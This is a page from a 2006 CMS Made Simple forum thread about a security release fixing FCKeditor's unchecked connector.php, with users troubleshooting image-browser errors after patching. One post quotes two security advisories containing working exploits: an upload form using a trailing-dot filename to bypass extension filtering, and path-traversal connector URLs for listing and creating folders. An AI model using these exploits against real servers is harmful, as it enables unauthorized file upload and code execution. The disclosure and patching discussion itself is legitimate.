• twitter image
  • facebook image
  • youtube image
  • linkedin image
Language: CMS Made Simple Czech CMS Made Simple France CMS Made Simple Spain CMS Made Simple Hungary CMS Made Simple Russia CMS Made Simple Netherlands

All times are UTC




Post new topic Reply to topic  [ 31 posts ]  Go to page Previous  1, 2, 3  Next
Author Message
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Wed May 10, 2006 11:21 pm 
Offline
Administrator
Administrator
User avatar

Joined: Fri Jun 11, 2004 6:58 pm
Posts: 3332
Location: Fairless Hills, Pa USA
Basically, the connector.php file isn't checking permissions.  If used the right way, it can cause someone to upload anything to the uploads/images directory.  My 2nd reply above basically explains how to fix it.  I assume it'll be the same process in TinyMCE.

_________________
http://about.me/tedkulp


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 7:38 am 
Offline
Forum Members
Forum Members
User avatar

Joined: Mon Jun 27, 2005 10:36 am
Posts: 144
Location: Southern France
OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon !


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 11:28 am 
I updated to the latest version 0.12.2 and there's an error with the image browser.

When I wanna put an Image in my editor it won't work anymore. When I delete the code:
Quote:
require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();


Then it works just fine!!!

This fix is not good I think.... Please help!!!!!!


Top
   
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 12:22 pm 
Offline
Administrator
Administrator
User avatar

Joined: Fri Jun 11, 2004 6:58 pm
Posts: 3332
Location: Fairless Hills, Pa USA
Is anyone else having an issue with this patch?  I just tested it in 3 different places and fck image browser still works when logged in.

_________________
http://about.me/tedkulp


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 12:43 pm 
Offline
Forum Members
Forum Members

Joined: Thu May 19, 2005 9:11 pm
Posts: 27
Yes i stumbled over the issue.... i got an javascripterror. The directory listing is missing....

Best regards
Chris


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 1:44 pm 
Offline
Administrator
Administrator
User avatar

Joined: Fri Jun 11, 2004 6:58 pm
Posts: 3332
Location: Fairless Hills, Pa USA
Was this an upgrade to 0.12.2?  Or the manual patching?

And I'm assuming this is IE 6...

_________________
http://about.me/tedkulp


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 2:17 pm 
Offline
Forum Members
Forum Members

Joined: Thu May 19, 2005 9:11 pm
Posts: 27
oh, i patched it manually. cmsmadesimple is in version 0.12beta or so but with many changes. Yes it was the ie6...........


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 2:19 pm 
evoluzzer wrote:
cmsmadesimple is in version 0.12beta


Perhaps you should go to 0.12.1 stable :) to the first ...


Top
   
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Thu May 11, 2006 3:27 pm 
Offline
Administrator
Administrator
User avatar

Joined: Fri Jun 11, 2004 6:58 pm
Posts: 3332
Location: Fairless Hills, Pa USA
Someone had the same issue while patching a 0.11.1 install this morning.  I'm thinking your best bet it to upgrade fully to 0.12.2.

_________________
http://about.me/tedkulp


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Fri May 12, 2006 4:04 am 
i didn't have any problem on the upgrade. i already upgraded to php5.1.4!


Top
   
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Fri May 12, 2006 9:05 pm 
Replacing that one php file fixes the security problem - right? I don't need to do anything else?


Top
   
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Fri May 12, 2006 11:05 pm 
Offline
Power Poster
Power Poster

Joined: Tue Dec 13, 2005 10:50 pm
Posts: 1408
Location: Finland
If you are runngin 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file)


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: about security flaw
PostPosted: Mon May 15, 2006 5:47 am 
Taken from SecurityFocus

Code:
NSAG-¹196-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
[b]FCKeditor 2.2[/b]

Site of manufacturer:
http://www.fckeditor.net

The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/893.html

Risk:
Critical

Description:
Detour of a filtration of expansions of files is possible.

Influence:
Loading of the forbidden files on target system.

Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector
.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>

In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created

Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!

www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.


and

Code:
Advisory:
NSAG-¹195-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
FCKeditor 2.0 FC

Site of manufacturer:
http://www.fckeditor.net

The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/952.html

Risk:
Hide

Description:
The output for limits of a virtual directory is possible.

Influence:
Listing of directories, creation of folders outside a virtual directory.

Exploit:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E

Decision:
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!

www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.


Top
   
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Wed May 17, 2006 4:19 pm 
Offline
Forum Members
Forum Members

Joined: Sun May 01, 2005 4:27 pm
Posts: 121
Location: Kent, UK
I get thiis javascript error when trying to insert an image too:

Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditorX/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html

I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
 Post subject: Re: 0.12.2 Released! Please READ!
PostPosted: Wed May 17, 2006 4:24 pm 
Offline
Administrator
Administrator
User avatar

Joined: Fri Jun 11, 2004 6:58 pm
Posts: 3332
Location: Fairless Hills, Pa USA
You made the patch to connector.php?  It wasn't a full upgrade, right?

_________________
http://about.me/tedkulp


Top
  Profile  
 
Share On:
Share on Facebook Share on Twitter Share on Google+
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 31 posts ]  Go to page Previous  1, 2, 3  Next

All times are UTC


Who is online

Users browsing this forum: No registered users


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Hosting Nation - Managed CMSMS Hosting